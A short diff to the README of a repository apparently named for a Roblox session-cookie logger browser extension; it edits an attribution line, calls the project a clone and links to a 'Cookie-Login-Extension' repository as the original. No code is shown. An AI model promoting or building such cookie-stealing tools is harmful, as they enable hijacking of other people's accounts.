keekzz13/.ROBLOXSECURITYlogger-Extension/README.md

 ---

-This project was inspired by Nick, founder of INJURIES
+This project was inspired by Nick, founder of INJURIES | Note: this is just a clone only.
+Original Concept & Code [severityc](https://github.com/severityc/Roblox-Cookie-Login-Extension/tree/main)